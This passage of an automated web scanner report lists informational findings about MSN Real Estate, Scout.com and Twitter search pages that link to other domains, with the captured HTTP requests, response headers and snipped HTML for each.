<p>According to the community's <a href="http://cpwliving.com/" onclick="window.open(this.href);return false;">website</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<br />Approved by the town of <a href="http://www.bing.com/search?q=apex%2C+n.c.&go=&form=MSREAL" onclick="window.open(this.href);return false;">Apex</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">Twenty best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.289. http://realestate.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/slideshow.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://realestate.redacted/slideshow.aspx?cp-documentid=26575521&GT1=35006

The response contains the following links to other domains:

http://businessweek.com/
http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-cb42799ca557bdac.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-dd7c094acdf69f72.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cpwliving.com/
http://delwebb.com/communities/tx/richmond/del-webb-houston/index.aspx
http://download.live.com/?sku=messenger
http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn
http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm
http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn
http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalrealest.112.2o7.net/b/ss/msnportalrealest/1/H.1--NS/0
http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js
http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/?form=SYNDRE
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=MSREAL
http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE
http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE
http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE
http://www.bing.com/search?q=Median+Home+Prices+by+State&FORM=MSREAL
http://www.bing.com/search?q=apex%2C+n.c.&go=&form=MSREAL
http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406636&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Fslideshow.aspx%3Fcp-documentid%3D26575521%26GT1%3D35006&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:16 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fc146fe65820484da7658692ce1e2a17; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2069133775604408A58F0028072AA305; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:16 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 90236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406636&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Fslideshow.aspx%3Fcp-documentid%3D26575521%26GT1%3D35006&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xb9ladS5yMb2Ca2ff4Vp00sgAXSoqJ534?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X8HntcrS-eQkL2XeTs9l7feCgy6mG3Xec?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-dd7c094acdf69f72.profile.live.com/msn/posts?mkt=en-US&domain=en-US">william green</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-dd7c094acdf69f72.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X5oUTRjU1vUfBWxKWcLjsoUOPyRmK1eNi?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XLkVMZuHEnRQzOwo1899GbHzPIG8NfpKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-cb42799ca557bdac.profile.live.com/msn/posts?mkt=en-US&domain=en-US">HELEN</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-cb42799ca557bdac.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&domain=en-US">r o
..(slipknot5)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Mike
..(NVanHiker)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://delwebb.com/communities/tx/richmond/del-webb-houston/index.aspx" onclick="window.open(this.href);return false;">Del Webb Sweetgrass</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<p>According to the community's <a href="http://cpwliving.com/" onclick="window.open(this.href);return false;">website</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<br />Approved by the town of <a href="http://www.bing.com/search?q=apex%2C+n.c.&go=&form=MSREAL" onclick="window.open(this.href);return false;">Apex</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">Twenty best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.290. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The page was loaded from a URL containing a query string:

http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88&yr=2011

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn/
http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1
http://entertainment.msn.com/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifestyle.redacted/
http://moneycentral.msn.com/home.asp
http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com
http://rss.redacted/
http://specials.redacted/alphabet.aspx
http://www.bing.com/search?FORM=FOXSP
http://www.foxsports.com/
http://www.redacted/
http://www.superprep.com/form.html
http://www.ticketcity.com/

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:50:45 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 21 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211589

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<center><a href="http://www.superprep.com/form.html"><img border=0 src="http://media.scout.com/media/image/18/188540.gif">
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1" />
   </noscript>
...[SNIP]...

22.291. http://rss.scout.com/rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rss.scout.com
Path:	/rss.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://rss.scout.com/rss.aspx?s=143&p=18

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn/
http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1
http://entertainment.msn.com/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifestyle.redacted/
http://moneycentral.msn.com/home.asp
http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com
http://rss.redacted/
http://specials.redacted/alphabet.aspx
http://www.bing.com/search?FORM=FOXSP
http://www.foxsports.com/
http://www.redacted/
http://www.ticketcity.com/

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/html; charset=utf-8
Akamai: True
Cache-Control: private, max-age=900
Date: Sun, 30 Jan 2011 02:18:31 GMT
Connection: close
Connection: Transfer-Encoding
Akamai: True
Content-Length: 263787

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: RSS Feeds</title>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1" />
   </noscript>
...[SNIP]...

22.292. http://search.twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://search.twitter.com/search?q=$1

The response contains the following links to other domains:

http://a0.twimg.com/profile_images/1118859259/31325_118988814788575_113537798667010_184317_4284322_n_normal.jpg
http://a0.twimg.com/profile_images/1226751532/9840300771itf4_normal.jpg
http://a1.twimg.com/profile_images/1161507057/Kinsey_normal.jpg
http://a2.twimg.com/profile_images/1184802298/DSC_0058_normal.jpg
http://a2.twimg.com/profile_images/445466122/JeffTaylor3_normal.JPG
http://a2.twimg.com/profile_images/933535501/huffingtonpost_normal.png
http://a3.twimg.com/profile_images/1213958941/image_normal.jpg
http://a3.twimg.com/profile_images/391715682/mm_twit_pic_normal.jpg
http://a3.twimg.com/profile_images/785995391/tumblr_kyl0syaldE1qzk29eo1_500_normal.jpg
http://a3.twimg.com/profile_images/799365774/26070_1377141794009_1395785394_31041221_1449864_n_normal.jpg
http://bit.ly/fNF1PS?=njmx
http://bit.ly/fW9BmK
http://blackberry.com/twitter
http://huff.to/gdVpZy
http://t.co/VN2VmIG
http://www.huffingtonpost.com/

Request

GET /search?q=$1 HTTP/1.1
Host: search.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:37:09 GMT
Server: hi
Status: 200 OK
X-Served-From: slc1-aav-26-sr1
X-Runtime: 0.78540
Content-Type: text/html; charset=utf-8
X-Timeline-Cache-Hit: Hit
X-Served-By: slc1-abf-32-sr1.prod.twitter.com
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Sun, 30 Jan 2011 01:42:08 GMT
Content-Length: 37363
Vary: Accept-Encoding
X-Varnish: 935694613
Age: 0
Via: 1.1 varnish
X-Cache-Svr: slc1-abf-32-sr1.prod.twitter.com
X-Cache: MISS
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=UTF-8">
       <meta name="descriptio
...[SNIP]...
<a href="http://twitter.com/MMflint" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/MMflint');"><img alt="Mm_twit_pic_normal" src="http://a3.twimg.com/profile_images/391715682/mm_twit_pic_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://blackberry.com/twitter" rel="nofollow">Twitter for BlackBerry..</a>
...[SNIP]...
<a href="http://twitter.com/huffingtonpost" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/huffingtonpost');"><img alt="Huffingtonpost_normal" src="http://a2.twimg.com/profile_images/933535501/huffingtonpost_normal.png" /></a>
...[SNIP]...
</b> trillion. A woman blamed him for 9/11. Good luck. <a href="http://huff.to/gdVpZy" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/link/30968352725794816');" rel="nofollow">http://huff.to/gdVpZy</a>
...[SNIP]...
<span class="source">via <a href="http://www.huffingtonpost.com" rel="nofollow">The Huffington Post</a>
...[SNIP]...
<a href="http://twitter.com/sadydoyle" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/sadydoyle');"><img alt="Tumblr_kyl0syalde1qzk29eo1_500_normal" src="http://a3.twimg.com/profile_images/785995391/tumblr_kyl0syaldE1qzk29eo1_500_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/lilmatttt" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/lilmatttt');"><img alt="Dsc_0058_normal" src="http://a2.twimg.com/profile_images/1184802298/DSC_0058_normal.jpg" /></a>
...[SNIP]...
</b> Trillion, Blamed for 9/11 | Billboard.com <a href="http://t.co/VN2VmIG" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31526221271539712');" rel="nofollow">http://t.co/VN2VmIG</a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/JeffTaylorTeam" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/JeffTaylorTeam');"><img alt="Jefftaylor3_normal" src="http://a2.twimg.com/profile_images/445466122/JeffTaylor3_normal.JPG" /></a>
...[SNIP]...
